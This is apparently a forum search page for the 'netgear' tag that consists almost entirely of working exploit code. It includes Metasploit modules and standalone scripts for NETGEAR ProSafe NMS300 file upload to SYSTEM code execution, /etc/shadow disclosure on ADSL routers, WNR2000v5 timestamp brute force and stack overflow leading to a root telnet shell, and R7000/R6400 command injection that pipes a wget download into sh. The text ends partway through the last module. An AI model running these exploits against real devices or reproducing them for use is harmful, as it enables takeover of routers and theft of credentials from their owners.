Forum search: showing results for the tag 'netgear'.
7 results found

  1. NETGEAR ProSafe Network Management System 300 Arbitrary File Upload (Metasploit module)

    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'

    class Metasploit4 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::EXE

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload',
          'Description'    => %q{
            Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.
            The application has a file upload vulnerability that can be exploited by an
            unauthenticated remote attacker to execute code as the SYSTEM user.
            Two servlets are vulnerable, FileUploadController (located at
            /lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at
            /fileUpload.do). This module exploits the latter, and has been tested with
            versions 1.5.0.2, 1.4.0.17 and 1.1.0.13.
          },
          'Author'         =>
            [
              'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module
            ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              ['CVE', '2016-1525'],
              ['US-CERT-VU', '777024'],
              ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'],
              ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/30']
            ],
          'DefaultOptions' => { 'WfsDelay' => 5 },
          'Platform'       => 'win',
          'Arch'           => ARCH_X86,
          'Privileged'     => true,
          'Targets'        =>
            [
              [ 'NETGEAR ProSafe Network Management System 300 / Windows', {} ]
            ],
          'DefaultTarget'  => 0,
          'DisclosureDate' => 'Feb 4 2016'))

        register_options(
          [
            Opt::RPORT(8080),
            OptString.new('TARGETURI', [true, "Application path", '/'])
          ], self.class)
      end

      # An unauthenticated GET to the upload servlet answers 405 (POST only) when it is present.
      def check
        res = send_request_cgi({
          'uri'    => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'),
          'method' => 'GET'
        })

        if res && res.code == 405
          Exploit::CheckCode::Detected
        else
          Exploit::CheckCode::Safe
        end
      end

      # Build a JSP that drops the base64-embedded EXE payload to a temp file and runs it.
      def generate_jsp_payload
        exe = generate_payload_exe
        base64_exe = Rex::Text.encode_base64(exe)
        payload_name = rand_text_alpha(rand(6)+3)

        var_raw     = 'a' + rand_text_alpha(rand(8) + 3)
        var_ostream = 'b' + rand_text_alpha(rand(8) + 3)
        var_buf     = 'c' + rand_text_alpha(rand(8) + 3)
        var_decoder = 'd' + rand_text_alpha(rand(8) + 3)
        var_tmp     = 'e' + rand_text_alpha(rand(8) + 3)
        var_path    = 'f' + rand_text_alpha(rand(8) + 3)
        var_proc2   = 'e' + rand_text_alpha(rand(8) + 3)

        jsp = %Q|
        <%@page import="java.io.*"%>
        <%@page import="sun.misc.BASE64Decoder"%>
        <%
        try {
          String #{var_buf} = "#{base64_exe}";
          BASE64Decoder #{var_decoder} = new BASE64Decoder();
          byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
          File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe");
          String #{var_path} = #{var_tmp}.getAbsolutePath();
          BufferedOutputStream #{var_ostream} =
            new BufferedOutputStream(new FileOutputStream(#{var_path}));
          #{var_ostream}.write(#{var_raw});
          #{var_ostream}.close();
          Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
        } catch (Exception e) {
        }
        %>
        |

        jsp.gsub!(/[\n\t\r]/, '')
        return jsp
      end

      def exploit
        jsp_payload = generate_jsp_payload
        jsp_name = Rex::Text.rand_text_alpha(8+rand(8))
        # The servlet prefixes the stored file name with the string "null".
        jsp_full_name = "null#{jsp_name}.jsp"

        post_data = Rex::MIME::Message.new
        post_data.add_part(jsp_name, nil, nil, 'form-data; name="name"')
        post_data.add_part(jsp_payload, "application/octet-stream", 'binary',
          "form-data; name=\"Filedata\"; filename=\"#{Rex::Text.rand_text_alpha(6+rand(10))}.jsp\"")
        data = post_data.to_s

        print_status("#{peer} - Uploading payload...")
        res = send_request_cgi({
          'uri'    => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'),
          'method' => 'POST',
          'data'   => data,
          'ctype'  => "multipart/form-data; boundary=#{post_data.bound}"
        })
        if res && res.code == 200 && res.body.to_s =~ /{"success":true, "file":"#{jsp_name}.jsp"}/
          print_status("#{peer} - Payload uploaded successfully")
        else
          fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
        end

        print_status("#{peer} - Executing payload...")
        send_request_cgi({
          'uri'    => normalize_uri(datastore['TARGETURI'], jsp_full_name),
          'method' => 'GET'
        })

        handler
      end
    end
  2. NETGEAR ADSL Router (WNR500 / WNR612v3 / JNR1010 / JNR2010) Authenticated Remote File Disclosure

    #!/bin/sh
    #
    # NETGEAR ADSL ROUTER
    # Authenticated Remote File Disclosure
    #
    # Hardware Version: WNR500 / WNR612v3 / JNR1010 / JNR2010
    # Firmware Version: 1.0.7.2 / 1.0.0.9 / 1.0.0.32 / 1.0.0.20
    #
    # Copyright 2016 (c) Todor Donev
    # <todor.donev at gmail.com>
    # https://www.ethical-hacker.org/
    # https://www.facebook.com/ethicalhackerorg
    #
    # Disclaimer:
    # This or previous programs is for Educational
    # purpose ONLY. Do not use it without permission.
    # The usual disclaimer applies, especially the
    # fact that Todor Donev is not liable for any
    # damages caused by direct or indirect use of the
    # information or functionality provided by these
    # programs. The author or any Internet provider
    # bears NO responsibility for content or misuse
    # of these programs or any derivatives thereof.
    # By using these programs you accept the fact
    # that any damage (dataloss, system crash,
    # system compromise, etc.) caused by the use
    # of these programs is not Todor Donev's
    # responsibility.
    #
    # Use them at your own risk!
    #
    # Thanks to Maya Hristova that support me.

    USER="${1:?usage: $0 USER PASSWORD TARGET PORT}"
    PASSWORD="${2:?}"
    TARGET="${3:?}"
    PORT="${4:?}"

    # webproc serves whatever path is named in getpage= to an authenticated
    # user, so the contents of /etc/shadow come back in the response body.
    curl -s -u "$USER:$PASSWORD" \
      "http://$TARGET:$PORT/cgi-bin/webproc?getpage=/etc/shadow&errorpage=html/main.html&var:language=en_us&var:language=en_us&var:page=BAS_bpa"

    # Sample output from a vulnerable device:
    # root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
    # tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
  3. NETGEAR ADSL Router JNR1010 1.0.0.16 Authenticated Remote File Disclosure

    #!/bin/sh
    #
    # NETGEAR ADSL ROUTER JNR1010 1.0.0.16
    # Authenticated Remote File Disclosure
    #
    # Hardware Version: JNR1010
    # Firmware Version: 1.0.0.16
    # GUI Language Version: 1.0.0.16
    #
    # Copyright 2016 (c) Todor Donev
    # <todor.donev at gmail.com>
    # https://www.ethical-hacker.org/
    # https://www.facebook.com/ethicalhackerorg
    #
    # Disclaimer:
    # This or previous programs is for Educational
    # purpose ONLY. Do not use it without permission.
    # The usual disclaimer applies, especially the
    # fact that Todor Donev is not liable for any
    # damages caused by direct or indirect use of the
    # information or functionality provided by these
    # programs. The author or any Internet provider
    # bears NO responsibility for content or misuse
    # of these programs or any derivatives thereof.
    # By using these programs you accept the fact
    # that any damage (dataloss, system crash,
    # system compromise, etc.) caused by the use
    # of these programs is not Todor Donev's
    # responsibility.
    #
    # Use them at your own risk!
    #
    # Thanks to Maya Hristova that support me.

    USER="${1:?usage: $0 USER PASSWORD TARGET PORT}"
    PASSWORD="${2:?}"
    TARGET="${3:?}"
    PORT="${4:?}"

    # Same webproc getpage= file disclosure, with the parameters this
    # firmware's GUI expects.
    curl -s -u "$USER:$PASSWORD" \
      "http://$TARGET:$PORT/cgi-bin/webproc?getpage=/etc/shadow&var:language=en_us&var:language=en_us&var:menu=advanced&var:page=basic_home"

    # Sample output from a vulnerable device:
    # root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
    # tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
  4. Remote code execution in NETGEAR WNR2000v5 (netgearPwn.rb)

    #
    # Source: https://github.com/pedrib/PoC/blob/2133bc3c0864c332bff7ce1000c83311316ac8ff/exploits/netgearPwn.rb
    #
    # Remote code execution in NETGEAR WNR2000v5
    # - by Pedro Ribeiro (pedrib@gmail.com) / Agile Information Security
    # Released on 20/12/2016
    #
    # NOTE: this exploit is "alpha" quality, however the bof method should work fine both with or without reboot.
    # A more reliable Metasploit module will be released soon.
    #
    #
    # TODO:
    # - randomise payload

    require 'net/http'
    require 'uri'
    require 'time'
    require 'digest'
    require 'openssl'
    require 'socket'

    ####################
    # ported from https://git.uclibc.org/uClibc/tree/libc/stdlib/random.c
    # and https://git.uclibc.org/uClibc/tree/libc/stdlib/random_r.c

    TYPE_3 = 3
    BREAK_3 = 128
    DEG_3 = 31
    SEP_3 = 3

    @randtbl = [
      # we omit TYPE_3 from here, not needed
      -1726662223, 379960547, 1735697613, 1040273694, 1313901226, 1627687941,
      -179304937, -2073333483, 1780058412, -1989503057, -615974602, 344556628,
      939512070, -1249116260, 1507946756, -812545463, 154635395, 1388815473,
      -1926676823, 525320961, -1009028674, 968117788, -123449607, 1284210865,
      435012392, -2017506339, -911064859, -370259173, 1132637927, 1398500161,
      -205601318,
    ]

    @unsafe_state = {
      "fptr" => SEP_3,
      "rptr" => 0,
      "state" => 0,
      "rand_type" => TYPE_3,
      "rand_deg" => DEG_3,
      "rand_sep" => SEP_3,
      "end_ptr" => DEG_3
    }

    # Emulate the behaviour of C's srand
    def srandom_r (seed)
      state = @randtbl
      if seed == 0
        seed = 1
      end
      state[0] = seed
      dst = 0
      word = seed
      kc = DEG_3
      for i in 1..(kc-1)
        hi = word / 127773
        lo = word % 127773
        word = 16807 * lo - 2836 * hi
        if (word < 0)
          word += 2147483647
        end
        dst += 1
        state[dst] = word
      end
      @unsafe_state['fptr'] = @unsafe_state['rand_sep']
      @unsafe_state['rptr'] = 0
      kc *= 10
      kc -= 1
      while (kc >= 0)
        random_r
        kc -= 1
      end
    end

    # Emulate the behaviour of C's rand
    def random_r
      buf = @unsafe_state
      state = buf['state']
      fptr = buf['fptr']
      rptr = buf['rptr']
      end_ptr = buf['end_ptr']
      val = @randtbl[fptr] += @randtbl[rptr]
      result = (val >> 1) & 0x7fffffff
      fptr += 1
      if (fptr >= end_ptr)
        fptr = state
        rptr += 1
      else
        rptr += 1
        if (rptr >= end_ptr)
          rptr = state
        end
      end
      buf['fptr'] = fptr
      buf['rptr'] = rptr
      result
    end
    #####################

    #####################
    # Ruby code ported from https://github.com/insanid/netgear-telenetenable
    #
    def telnetenable (username, password)
      mac_pad = @mac.gsub(':', '').upcase.ljust(0x10,"\x00")
      username_pad = username.ljust(0x10, "\x00")
      password_pad = password.ljust(0x21, "\x00")
      cleartext = (mac_pad + username_pad + password_pad).ljust(0x70, "\x00")
      md5 = Digest::MD5.new
      md5.update(cleartext)
      payload = (md5.digest + cleartext).ljust(0x80, "\x00").unpack('N*').pack('V*')
      secret_key = "AMBIT_TELNET_ENABLE+" + password
      cipher = OpenSSL::Cipher.new("bf-ecb")
      cipher.encrypt
      cipher.key_len = secret_key.length
      cipher.key = secret_key
      cipher.padding = 0
      binary_data = (cipher.update(payload) << cipher.final)
      s = UDPSocket.new
      s.send(binary_data.unpack('N*').pack('V*'), 0, @target.split(':')[0], 23)
    end
    #####################

    # Do some crazyness to force Ruby to cast to a single-precision float and
    # back to an integer.
    # This emulates the behaviour of the soft-fp library and the float cast
    # which is done at the end of Netgear's timestamp generator.
    def ieee754_round (number)
      [number].pack('f').unpack('f*')[0].to_i
    end

    # This is the actual algorithm used in the get_timestamp function in
    # the Netgear firmware.
    def get_timestamp(time)
      srandom_r time
      t0 = random_r
      t1 = 0x17dc65df;
      hi = (t0 * t1) >> 32;
      t2 = t0 >> 31;
      t3 = hi >> 23;
      t3 = t3 - t2;
      t4 = t3 * 0x55d4a80;
      t0 = t0 - t4;
      t0 = t0 + 0x989680;
      ieee754_round(t0)
    end

    # Default credentials for the router
    USERNAME = "admin"
    PASSWORD = "password"

    def get_request(uri_str)
      uri = URI.parse(uri_str)
      http = Net::HTTP.new(uri.host, uri.port)
      #http.set_debug_output($stdout)
      request = Net::HTTP::Get.new(uri.request_uri)
      request.basic_auth(USERNAME, PASSWORD)
      http.request(request)
    end

    def post_request(uri_str, body)
      uri = URI.parse(uri_str)
      header = { 'Content-Type' => 'application/x-www-form-urlencoded' }
      http = Net::HTTP.new(uri.host, uri.port)
      #http.set_debug_output($stdout)
      request = Net::HTTP::Post.new(uri.request_uri, header)
      request.basic_auth(USERNAME, PASSWORD)
      request.body = body
      http.request(request)
    end

    def check
      response = get_request("http://#{@target}/")
      auth = response['WWW-Authenticate']
      if auth != nil
        if auth =~ /WNR2000v5/
          puts "[+] Router is vulnerable and exploitable (WNR2000v5)."
          return
        elsif auth =~ /WNR2000v4/ || auth =~ /WNR2000v3/
          puts "[-] Router is vulnerable, but this exploit might not work (WNR2000v3 or v4)."
          return
        end
      end
      puts "Router is not vulnerable."
    end

    def get_password
      response = get_request("http://#{@target}/BRS_netgear_success.html")
      if response.body =~ /var sn="([\w]*)";/
        serial = $1
      else
        puts "[-]Failed to obtain serial number, bailing out..."
        exit(1)
      end

      # 1: send serial number
      response = post_request("http://#{@target}/apply_noauth.cgi?/unauth.cgi",
        "submit_flag=match_sn&serial_num=#{serial}&continue=+Continue+")

      # 2: send answer to secret questions
      response = post_request("http://#{@target}/apply_noauth.cgi?/securityquestions.cgi",
        "submit_flag=security_question&answer1=secretanswer1&answer2=secretanswer2&continue=+Continue+")

      # 3: PROFIT!!!
      response = get_request("http://#{@target}/passwordrecovered.cgi")
      if response.body =~ /Admin Password: (.*)<\/TD>/
        password = $1
      else
        puts "[-] Failed to obtain admin password, bailing out..."
        exit(1)
      end
      if response.body =~ /Admin Username: (.*)<\/TD>/
        username = $1
      else
        puts "[-] Failed to obtain admin username, bailing out..."
        exit(1)
      end

      puts "[+] Success! Got admin username #{username} and password #{password}"
      return [username, password]
    end

    def get_current_time
      response = get_request("http://#{@target}/")
      date = response['Date']
      Time.parse(date).strftime('%s').to_i
    end

    def get_auth_timestamp(mode)
      if mode == "bof"
        uri_str = "http://#{@target}/lang_check.html"
      else
        uri_str = "http://#{@target}/PWD_password.htm"
      end
      response = get_request(uri_str)
      # Net::HTTP returns the status code as a String, so compare against "401"/"200".
      if response.code == "401"
        # try again, might fail the first time
        response = get_request(uri_str)
        if response.code == "200"
          if response.body =~ /timestamp=([0-9]{8})/
            $1.to_i
          end
        end
      end
    end

    def got_shell
      puts "[+] Success, shell incoming!"
      exec("telnet #{@target.split(':')[0]}")
    end

    if ARGV.length < 2
      puts "Usage: ./netgearPwn.rb <IP:PORT> <check|bof|telnet <MAC>> [noreboot]"
      puts "\tcheck: see if the target is vulnerable"
      puts "\tbof: run buffer overflow exploit on the target"
      puts "\ttelnet <mac>: run telnet exploit on the target, needs MAC address"
      puts "\tnoreboot: optional parameter - don't force a reboot on the target"
      exit(1)
    end

    @target = ARGV[0]
    mode = ARGV[1]
    if (ARGV.length > 2 && ARGV[2] == "noreboot") || (ARGV.length > 3 && ARGV[3] == "noreboot")
      reboot = false
    else
      reboot = true
    end

    if mode == "telnet"
      if ARGV.length == 3
        @mac = ARGV[2]
      elsif ARGV.length == 4
        @mac = ARGV[3]
      else
        puts "[-] telnet mode needs MAC address argument!"
        exit(-1)
      end
    end

    # Maximum time differential to try
    # Look 5000 seconds back for the timestamp with reboot
    # 500000 with no reboot
    if reboot
      TIME_OFFSET = 5000
    else
      TIME_OFFSET = 500000
    end

    # Increase this if you're sure the device is vulnerable and you're not getting a shell
    TIME_SURPLUS = 200

    if mode == "check"
      check
      exit(0)
    end

    if mode == "bof"
      def uri_encode (str)
        "%" + str.scan(/.{2}|.+/).join("%")
      end

      def calc_address (libc_base, offset)
        addr = (libc_base + offset).to_s(16)
        uri_encode(addr)
      end

      system_offset = 0x547D0
      gadget = 0x2462C
      libc_base = 0x2ab24000

      payload = 'a' * 36 +                              # filler_1
        calc_address(libc_base, system_offset) +        # s0
        '1111' +                                        # s1
        '2222' +                                        # s2
        '3333' +                                        # s3
        calc_address(libc_base, gadget) +               # gadget
        'b' * 0x40 +                                    # filler_2
        "killall telnetenable; killall utelnetd; /usr/sbin/utelnetd -d -l /bin/sh" # payload
    end

    # 0: try to see if the default admin username and password are set
    timestamp = get_auth_timestamp(mode)

    # 1: reboot the router to get it to generate new timestamps
    if reboot and timestamp == nil
      response = post_request("http://#{@target}/apply_noauth.cgi?/reboot_waiting.htm", "submit_flag=reboot&yes=Yes")
      if response.code == "200"
        puts "[+] Successfully rebooted the router. Now wait two minutes for the router to restart..."
        sleep 120
        puts "[*] Connect to the WLAN or Ethernet now. You have one minute to comply."
        sleep 60
      else
        puts "[-] Failed to reboot the router. Bailing out."
        exit(-1)
      end
      puts "[*] Proceeding..."
    end

    # 2: get the current date from the router and parse it, but only if we are not authenticated...
    if timestamp == nil
      end_time = get_current_time
      if end_time <= TIME_OFFSET
        start_time = 0
      else
        start_time = end_time - TIME_OFFSET
      end
      end_time += TIME_SURPLUS
      if end_time < (TIME_SURPLUS * 7.5).to_i
        end_time = (TIME_SURPLUS * 7.5).to_i
      end
      puts "[+] Got time #{end_time} from router, starting exploitation attempt."
      puts "[*] Be patient, this might take up a long time (typically a few minutes, but maybe an hour or more)."
    else
      # authenticated: there is only one timestamp to try, so each round is a single request
      start_time = 0
      end_time = 0
    end

    if mode == "bof"
      uri_str = "http://#{@target}/apply_noauth.cgi?/lang_check.html%20timestamp="
      body = "submit_flag=select_language&hidden_lang_avi=#{payload}"
    else
      uri_str = "http://#{@target}/apply_noauth.cgi?/PWD_password.htm%20timestamp="
      body = "submit_flag=passwd&hidden_enable_recovery=1&Apply=Apply&sysOldPasswd=&sysNewPasswd=&sysConfirmPasswd=&enable_recovery=on&question1=1&answer1=secretanswer1&question2=2&answer2=secretanswer2"
    end

    # 3: work back from the current router time minus TIME_OFFSET
    while true
      for time in end_time.downto(start_time)
        begin
          if timestamp == nil
            response = post_request(uri_str + get_timestamp(time).to_s, body)
          else
            response = post_request(uri_str + timestamp.to_s, body)
          end
          if response.code == "200"
            # this only occurs in the telnet case
            credentials = get_password
            telnetenable(credentials[0], credentials[1])
            sleep 5
            got_shell
            #puts "Done! Got admin username #{credentials[0]} and password #{credentials[1]}"
            #puts "Use the telnetenable.py script (https://github.com/insanid/netgear-telenetenable) to enable telnet, and connect to port 23 to get a root shell!"
            exit(0)
          end
        rescue EOFError
          if reboot
            sleep 0.2
          else
            # with no reboot we give the router more time to breathe
            sleep 0.5
          end
          begin
            s = TCPSocket.new(@target.split(':')[0], 23)
            s.close
            got_shell
          rescue Errno::ECONNREFUSED
            if timestamp != nil
              # this is the case where we can get an authenticated timestamp but we could not execute code
              # IT SHOULD NEVER HAPPEN
              # But scream and continue just in case, it means there is a bug
              puts "[-] Something went wrong. We can obtain the timestamp with the default credentials, but we could not execute code."
              puts "[*] Let's try again..."
              timestamp = get_auth_timestamp(mode)
            end
            next
          end
        rescue Net::ReadTimeout
          # for bof case, we land here
          got_shell
        end
      end
      if timestamp == nil
        start_time = end_time - (TIME_SURPLUS * 5)
        end_time = end_time + (TIME_SURPLUS * 5)
        puts "[*] Going for another round, increasing end time to #{end_time} and start time to #{start_time}"
      end
    end

    # If we get here then the exploit failed
    puts "[-] Exploit finished. Failed to get a shell!"
  5. Netgear R7000 and R6400 cgi-bin Command Injection (Metasploit module)

    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'

    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager

      def initialize(info = {})
        super(update_info(info,
          'Name'           => "Netgear R7000 and R6400 cgi-bin Command Injection",
          'Description'    => %q{
            This module exploits an arbitrary command injection vulnerability in Netgear
            R7000 and R6400 router firmware version 1.0.7.2_1.1.93 and possibly earlier.
          },
          'License'        => MSF_LICENSE,
          'Platform'       => 'linux',
          'Author'         => ['thecarterb', 'Acew0rm'],
          'DefaultTarget'  => 0,
          'Privileged'     => true,
          'Arch'           => ARCH_ARMLE,
          'Targets'        => [ [ 'Automatic Target', { } ] ],
          'References'     =>
            [
              [ 'EDB', '40889'],
              [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=305'],
              [ 'URL', 'https://www.kb.cert.org/vuls/id/582384'],
              [ 'URL', 'http://kb.netgear.com/000036386/CVE-2016-582384'],
              [ 'CVE', '2016-6277']
            ],
          'DisclosureDate' => 'Dec 06 2016',
          'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/mettle_reverse_tcp' }
        ))

        register_options(
          [
            Opt::RPORT(80)
          ], self.class)

        deregister_options('URIPATH')
      end

      def scrape(text, start_trig, end_trig)
        text[/#{start_trig}(.*?)#{end_trig}/m, 1]
      end

      # Requests the login page which discloses the hardware, if it's an R7000 or R6400, return Detected
      def check
        res = send_request_cgi({'uri'=>'/'})
        if res.nil?
          fail_with(Failure::Unreachable, 'Connection timed out.')
        end

        # Checks for the `WWW-Authenticate` header in the response
        if res.headers["WWW-Authenticate"]
          data = res.to_s
          marker_one = "Basic realm=\"NETGEAR "
          marker_two = "\""
          model = scrape(data, marker_one, marker_two)
          vprint_status("Router is a NETGEAR router (#{model})")
          if model == 'R7000' || model == 'R6400'
            print_good("Router may be vulnerable (NETGEAR #{model})")
            return CheckCode::Detected
          else
            return CheckCode::Safe
          end
        else
          print_error('Router is not a NETGEAR router')
          return CheckCode::Safe
        end
      end

      def exploit
        return if check == CheckCode::Safe

        @cmdstager = generate_cmdstager(flavor: :wget, 'Path' => '/').join(';')

        # The firmware passes the path after /cgi-bin/ to a shell; $IFS stands in for spaces.
        send_request_cgi(
          'method' => 'GET',
          'uri'    => "/cgi-bin/;wget$IFS-O-$IFS'#{srvhost_addr}:#{srvport}'|sh"
        )
      end

      # Return CmdStager on first request, payload on second
      def on_request_uri(cli, request)
        if @cmdstager
          send_response(cli, @cmdstager)
          @cmdstager = nil
        else
          super
        end
      end
    end
  6. NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit module)

    ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'
    require 'time'

    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient
      include Msf::Auxiliary::CRand

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Overflow',
          'Description'    => %q{
            The NETGEAR WNR2000 router has a buffer overflow vulnerability in the hidden_lang_avi
            parameter. In order to exploit it, it is necessary to guess the value of a certain timestamp
            which is in the configuration of the router. An authenticated attacker can simply fetch this
            from a page, but an unauthenticated attacker has to brute force it.
            Bruteforcing the timestamp token might take a few minutes, a few hours, or days, but it is
            guaranteed that it can be bruteforced.
            This module implements both modes, and it works very reliably. It has been tested with the
            WNR2000v5, firmware versions 1.0.0.34 and 1.0.0.18. It should also work with hardware
            revisions v4 and v3, but this has not been tested - with these routers it might be necessary
            to adjust the LibcBase variable as well as the gadget addresses.
          },
          'Author'         =>
            [
              'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module
            ],
          'License'        => MSF_LICENSE,
          'Platform'       => ['unix'],
          'References'     =>
            [
              ['CVE', '2016-10174'],
              ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear-wnr2000.txt'],
              ['URL', 'http://seclists.org/fulldisclosure/2016/Dec/72'],
              ['URL', 'http://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability']
            ],
          'Targets'        =>
            [
              [ 'NETGEAR WNR2000v5',
                {
                  'LibcBase'     => 0x2ab24000, # should be the same offset for all firmware versions (in libuClibc-0.9.30.1.so)
                  'SystemOffset' => 0x547D0,
                  'GadgetOffset' => 0x2462C,
                  # The ROP gadget will load $sp into $a0 (which will contain the system() command)
                  # and call $s0 (which will contain the address of system()):
                  # LOAD:0002462C addiu $a0, $sp, 0x40+arg_0
                  # LOAD:00024630 move $t9, $s0
                  # LOAD:00024634 jalr $t9
                  'Payload'      =>
                    {
                      'BadChars' => "\x00\x25\x26",
                      'Compat'   =>
                        {
                          'PayloadType'    => 'cmd_interact',
                          'ConnectionType' => 'find',
                        },
                    },
                }
              ],
            ],
          'Privileged'     => true,
          'Arch'           => ARCH_CMD,
          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
          'DisclosureDate' => 'Dec 20 2016',
          'DefaultTarget'  => 0))
        register_options(
          [
            Opt::RPORT(80),
            OptString.new('HttpUsername', [true, 'Username for the web interface (not needed but exploitation is faster)', 'admin']),
            OptString.new('HttpPassword', [true, 'Password for the web interface (not needed but exploitation is faster)', 'password']),
          ], self.class)
        register_advanced_options(
          [
            OptInt.new('TIME_OFFSET', [true, 'Maximum time differential to try', 5000]),
            OptInt.new('TIME_SURPLUS', [true, 'Increase this if you are sure the device is vulnerable and you are not getting a shell', 200])
          ], self.class)
      end

      def check
        res = send_request_cgi({
          'uri'    => '/',
          'method' => 'GET'
        })

        if res && res.headers['WWW-Authenticate']
          auth = res.headers['WWW-Authenticate']
          if auth =~ /WNR2000v5/
            return Exploit::CheckCode::Detected
          elsif auth =~ /WNR2000v4/ || auth =~ /WNR2000v3/
            return Exploit::CheckCode::Unknown
          end
        end

        Exploit::CheckCode::Safe
      end

      def uri_encode (str)
        "%" + str.scan(/.{2}|.+/).join("%")
      end

      def calc_address (libc_base, offset)
        addr = (libc_base + offset).to_s(16)
        uri_encode(addr)
      end

      def get_current_time
        res = send_request_cgi({
          'uri'    => '/',
          'method' => 'GET'
        })

        if res && res['Date']
          date = res['Date']
          return Time.parse(date).strftime('%s').to_i
        end
      end

      def get_auth_timestamp
        res = send_request_raw({
          'uri'    => '/lang_check.html',
          'method' => 'GET',
          # automatically uses HttpPassword and HttpUsername to authenticate
        })

        if res && res.code == 401
          # try again, might fail the first time
          res = send_request_raw({
            'uri'    => '/lang_check.html',
            'method' => 'GET',
            # automatically uses HttpPassword and HttpUsername to authenticate
          })
        end

        if res && res.code == 200
          if res.body =~ /timestamp=([0-9]{8})/
            $1.to_i
          end
        end
      end

      # Do some crazyness to force Ruby to cast to a single-precision float and
      # back to an integer.
      # This emulates the behaviour of the soft-fp library and the float cast
      # which is done at the end of Netgear's timestamp generator.
      def ieee754_round (number)
        [number].pack('f').unpack('f*')[0].to_i
      end

      # This is the actual algorithm used in the get_timestamp function in
      # the Netgear firmware.
      def get_timestamp(time)
        srandom_r time
        t0 = random_r
        t1 = 0x17dc65df;
        hi = (t0 * t1) >> 32;
        t2 = t0 >> 31;
        t3 = hi >> 23;
        t3 = t3 - t2;
        t4 = t3 * 0x55d4a80;
        t0 = t0 - t4;
        t0 = t0 + 0x989680;
        ieee754_round(t0)
      end

      def get_payload
        rand_text_alpha(36) +                                               # filler_1
        calc_address(target['LibcBase'], target['SystemOffset']) +          # s0
        rand_text_alpha(12) +                                               # s1, s2 and s3
        calc_address(target['LibcBase'], target['GadgetOffset']) +          # gadget
        rand_text_alpha(0x40) +                                             # filler_2
        "killall telnetenable; killall utelnetd; /usr/sbin/utelnetd -d -l /bin/sh" # payload
      end

      def send_req(timestamp)
        begin
          if timestamp == nil
            uri_str = "/apply_noauth.cgi?/lang_check.html"
          else
            uri_str = "/apply_noauth.cgi?/lang_check.html%20timestamp=#{timestamp.to_s}"
          end

          res = send_request_raw({
            'uri'     => uri_str,
            'method'  => 'POST',
            'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },
            'data'    => "submit_flag=select_language&hidden_lang_avi=#{get_payload}"
          })
        rescue ::Errno::ETIMEDOUT, ::Errno::ECONNRESET, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
          return
        end
      end

      def exploit
        # 1: try to see if the default admin username and password are set
        timestamp = get_auth_timestamp

        # 2: now we try two things at once:
        # one, if the timestamp is not nil then we got an authenticated timestamp, let's try that
        # two, if the timestamp is nil, then let's try without timestamp first (the timestamp only gets set if the user visited the page before)
        print_status("#{peer} - Trying the easy way out first")
        send_req(timestamp)

        begin
          ctx = { 'Msf' => framework, 'MsfExploit' => self }
          sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => 23, 'Context' => ctx, 'Timeout' => 10 })
          if not sock.nil?
            print_good("#{peer} - Success, shell incoming!")
            return handler(sock)
          end
        rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
          sock.close if sock
        end

        print_bad("#{peer} - Well that didn't work... let's do it the hard way.")

        # no shell? let's just go on and bruteforce the timestamp
        # 3: get the current date from the router and parse it
        end_time = get_current_time
        if end_time.nil?
          fail_with(Failure::Unknown, "#{peer} - Unable to obtain current time")
        end

        if end_time <= datastore['TIME_OFFSET']
          start_time = 0
        else
          start_time = end_time - datastore['TIME_OFFSET']
        end
        end_time += datastore['TIME_SURPLUS']

        if end_time < (datastore['TIME_SURPLUS'] * 7.5).to_i
          end_time = (datastore['TIME_SURPLUS'] * 7.5).to_i
        end

        print_good("#{peer} - Got time #{end_time} from router, starting exploitation attempt.")
        print_status("#{peer} - Be patient, this might take a long time (typically a few minutes, but it might take hours).")

        # 2: work back from the current router time minus datastore['TIME_OFFSET']
        while true
